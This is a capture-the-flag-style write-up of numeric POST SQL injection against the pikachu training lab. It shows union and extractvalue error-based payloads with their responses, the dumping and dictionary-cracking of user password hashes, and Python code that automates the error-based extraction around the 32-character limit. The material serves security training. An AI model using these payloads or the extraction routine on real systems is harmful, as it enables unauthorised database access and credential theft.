pikachu lab - SQLi - numeric injection (POST)
- Request method: POST
- Wrapping: id=1 (the value is used as a bare number, so there is no quote to close before the payload)
- Injection types: union, error-based, boolean blind, time-based
Below, union injection and error-based injection are demonstrated by hand.
Union injection
First, determine the number of columns with order by:
id=1 order by 1#&submit=%E6%9F%A5%E8%AF%A2
Normal response
id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
Normal response
id=1 order by 3#&submit=%E6%9F%A5%E8%AF%A2
Response:
Unknown column '3' in 'order clause'
Number of columns: 2 (the first N that errors is one past the width of the original select)
Find the database (id=-1 matches no real row, so the union row is what gets echoed into the two output slots):
id=-1 union select 1,database()#&submit=%E6%9F%A5%E8%AF%A2
Response:
hello,1
your email is: pikachu
Database name: pikachu
Find the tables:
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#&submit=%E6%9F%A5%E8%AF%A2
Response:
hello,1
your email is: httpinfo,member,message,users,xssblind
Table names: httpinfo,member,message,users,xssblind
Find the columns of the users table:
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' #&submit=%E6%9F%A5%E8%AF%A2
Response:
hello,1
your email is:id,username,password,level
Column names: id,username,password,level
Dump the data (both output slots are usable, so two columns can be read per request):
id=-1 union select group_concat(username),group_concat(password) from users#&submit=%E6%9F%A5%E8%AF%A2
id=-1 union select group_concat(username),group_concat(level) from users#&submit=%E6%9F%A5%E8%AF%A2
Responses:
hello,admin,pikachu,test
your email is: e10adc3949ba59abbe56e057f20f883e,670b14728ad9902aecba32e22fa4f6bd,e99a18c428cb38d5f260853678922e03
hello,admin,pikachu,test
your email is: 1,2,3
Look up the password hashes (unsalted MD5 is not reversible; these are dictionary lookups of common passwords, which is why the "decryption" succeeds):
e10adc3949ba59abbe56e057f20f883e — 123456
670b14728ad9902aecba32e22fa4f6bd — 000000
e99a18c428cb38d5f260853678922e03 — abc123
Usernames:
admin,pikachu,test
Passwords:
123456,000000,abc123
level:
1,2,3
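The numeric injection point, the order-by column probe and the union dump above, as an added example that is not part of the original write-up or of the pikachu project. It uses SQLite as a stand-in for MySQL (so the comment is -- instead of #, and there is no information_schema), and it assumes the lab's query has the shape "select username,email from member where id=$id"; the sample rows are constructed. The hardened lookup beside it shows why the same payloads fail against a parameterised query.

```python
import sqlite3

# Constructed sample rows modelled on the pikachu lab's tables (an assumption; the real
# member table has more columns than used here).
USERS = [(1, "admin", "e10adc3949ba59abbe56e057f20f883e", 1),
         (2, "pikachu", "670b14728ad9902aecba32e22fa4f6bd", 2),
         (3, "test", "e99a18c428cb38d5f260853678922e03", 3)]
MEMBERS = [(1, "vince", "vince@pikachu.com"), (2, "allen", "allen@pikachu.com")]


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer, username text, password text, level integer)")
    conn.execute("create table member(id integer, username text, email text)")
    conn.executemany("insert into users values (?,?,?,?)", USERS)
    conn.executemany("insert into member values (?,?,?)", MEMBERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """Numeric injection point: the POST value is concatenated into the SQL unquoted
    (assumed to mirror the lab's 'select username,email from member where id=$id').
    Returns (rows, error_message); the error text is what the lab echoes back."""
    sql = f"select username, email from member where id={user_id}"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.OperationalError as e:
        return [], str(e)


def safe_lookup(conn, user_id):
    """Hardened form: reject anything that is not an integer, then bind the value as a
    parameter so the driver never lets it become part of the SQL text."""
    uid = int(str(user_id).strip())  # raises ValueError on 'order by', 'union', ...
    return conn.execute("select username, email from member where id=?", (uid,)).fetchall()


def count_columns(conn, max_cols=10):
    """Replicates the 'order by N' probe: the first N that errors is one past the width."""
    for n in range(1, max_cols + 1):
        _, err = vulnerable_lookup(conn, f"1 order by {n}--")
        if err:
            return n - 1
    return None


def dump_users(conn):
    """Replicates the union dump: id=-1 selects no real row, so the union row is the one
    echoed into the two output slots. Returns {username: password_hash}."""
    ncols = count_columns(conn)
    if ncols != 2:
        raise RuntimeError(f"unexpected column count {ncols}")
    payload = "-1 union select group_concat(username), group_concat(password) from users--"
    rows, err = vulnerable_lookup(conn, payload)
    if err or not rows:
        raise RuntimeError(f"union failed: {err}")
    names, hashes = rows[0]
    return dict(zip(names.split(","), hashes.split(",")))
```

Against the real lab the same payloads go into the POST body with # as the comment and information_schema for the table and column names, exactly as in the requests above; the parameterised version simply never runs them as SQL.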
Error-based injection
Find the database (extractvalue raises an XPath error whose message contains the injected string; 0x7e is ~, which makes the XPath invalid and marks where the data starts):
id=-1 and extractvalue(1,concat(0x7e,(select database())))#&submit=%E6%9F%A5%E8%AF%A2
Response:
XPATH syntax error: '~pikachu'
Find the tables:
id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')))#&submit=%E6%9F%A5%E8%AF%A2
Response:
XPATH syntax error: '~httpinfo,member,message,users,x'
The error message only shows 32 characters of the string (the leading ~ counts), so the list is cut off after "x".
If the table you need is not visible, page through the names with limit instead.
Find the columns of the users table:
id=-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')))#&submit=%E6%9F%A5%E8%AF%A2
Response:
XPATH syntax error: '~id,username,password,level'
Dump the data (one value per request, walking the rows with limit N,1):
id=-1 and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#&submit=%E6%9F%A5%E8%AF%A2
Response:
XPATH syntax error: '~admin'
limit 1,1
Response:
XPATH syntax error: '~pikachu'
limit 2,1
Response:
XPATH syntax error: '~test'
limit 3,1
Response:
您输入的user id不存在 (the user id you entered does not exist)
No error this time: the subquery returns no row, so the argument to concat() is NULL and extractvalue raises nothing. That means there are only 3 rows.
Then the password column:
id=-1 and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))#&submit=%E6%9F%A5%E8%AF%A2
Response:
XPATH syntax error: '~e10adc3949ba59abbe56e057f20f883'
limit 1,1
Response:
XPATH syntax error: '~670b14728ad9902aecba32e22fa4f6b'
limit 2,1
Response:
XPATH syntax error: '~e99a18c428cb38d5f260853678922e0'
Note the same 32-character window: each response is ~ plus 31 hex characters, so the last character of every 32-character MD5 is missing. The full hashes below are the ones already recovered by the union query above; with error-based injection alone, the remaining character has to be fetched with a second request that selects a substring of the value.
Look up the password hashes (unsalted MD5, dictionary lookup rather than decryption):
e10adc3949ba59abbe56e057f20f883e — 123456
670b14728ad9902aecba32e22fa4f6bd — 000000
e99a18c428cb38d5f260853678922e03 — abc123
Usernames:
admin,pikachu,test
Passwords:
123456,000000,abc123
If you also need the level column, query it the same way as username and password ^^
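The 32-character limit noted above, and the truncated hashes it produces, are the practical problem with extractvalue. As an added example that is not part of the original write-up or of the pikachu project, the following reads a value of any length through that window by asking for 31-character substr() slices, and walks the rows with limit N,1 until the NULL response appears. The lab is replaced by a hypothetical fake_pikachu() that evaluates the injected scalar with SQLite and reproduces MySQL's 32-character truncation and its NULL behaviour; the sample rows are constructed. Against the real lab, fake_pikachu would be replaced by a function that POSTs the body to sqli_id.php and returns the response text.

```python
import re
import sqlite3

# Constructed sample rows modelled on the pikachu users table (an assumption, not a dump
# of the lab); the hashes are the unsalted MD5s the write-up lists.
USERS = [(1, "admin", "e10adc3949ba59abbe56e057f20f883e", 1),
         (2, "pikachu", "670b14728ad9902aecba32e22fa4f6bd", 2),
         (3, "test", "e99a18c428cb38d5f260853678922e03", 3)]

_conn = sqlite3.connect(":memory:")
_conn.execute("create table users(id integer, username text, password text, level integer)")
_conn.executemany("insert into users values (?,?,?,?)", USERS)

# Same shape as the payloads above: the scalar expression goes inside concat(0x7e,(...)).
PREFIX = "id=-1 and extractvalue(1,concat(0x7e,("
SUFFIX = ")))#&submit=%E6%9F%A5%E8%AF%A2"
ERR = re.compile(r"XPATH syntax error: '~(.*)'")


def build_payload(expr):
    """POST body that leaks one scalar SQL expression through the EXTRACTVALUE error."""
    return f"{PREFIX}{expr}{SUFFIX}"


def fake_pikachu(body):
    """Hypothetical stand-in for the lab's sqli_id.php: evaluates the injected scalar
    with SQLite and mimics MySQL, which keeps only 32 characters of the bad XPath string
    in the error text and raises no error at all when the argument is NULL."""
    if not (body.startswith(PREFIX) and body.endswith(SUFFIX)):
        return "您输入的user id不存在"
    expr = body[len(PREFIX):-len(SUFFIX)]
    value = _conn.execute(f"select ({expr})").fetchone()[0]
    if value is None:                       # concat(0x7e, NULL) is NULL -> no XPath error
        return "您输入的user id不存在"
    return f"XPATH syntax error: '{('~' + str(value))[:32]}'"


def extract(oracle, expr, chunk=31):
    """Read the whole value of expr through the 32-char window: '~' takes one
    character, so each request asks for the next 31 with substr()."""
    out, start = "", 1
    while True:
        resp = oracle(build_payload(f"substr(({expr}),{start},{chunk})"))
        m = ERR.search(resp)
        if m is None:                       # NULL (e.g. limit past the last row)
            return None
        piece = m.group(1)
        out += piece
        if len(piece) < chunk:              # short (or empty) piece: value exhausted
            return out
        start += chunk


def dump_column(oracle, column, table="users"):
    """Walk rows with limit N,1 until the subquery yields NULL, as the write-up does."""
    rows = []
    i = 0
    while True:
        value = extract(oracle, f"select {column} from {table} limit {i},1")
        if value is None:
            return rows
        rows.append(value)
        i += 1
```

A 32-character MD5 costs two requests per row this way (31 characters, then 1); a short value such as a username still costs one, because a piece shorter than 31 characters ends the loop without an extra probe.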